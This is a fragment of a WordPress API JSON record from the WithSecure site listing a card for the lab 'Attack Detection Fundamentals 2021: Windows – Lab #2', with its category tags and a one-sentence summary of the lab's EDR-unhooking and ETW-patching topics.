618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: Windows &#8211; Lab #2<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this lab, we&#039;ll continue to refine our payload, introducing other defense evasion techniques to unhook potentially EDR-monitored API functions, and patch ETW to ensure our subsequent activities aren&#039;t seen by security tools that rely on this telemetry source for their detections.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            
<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10523"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}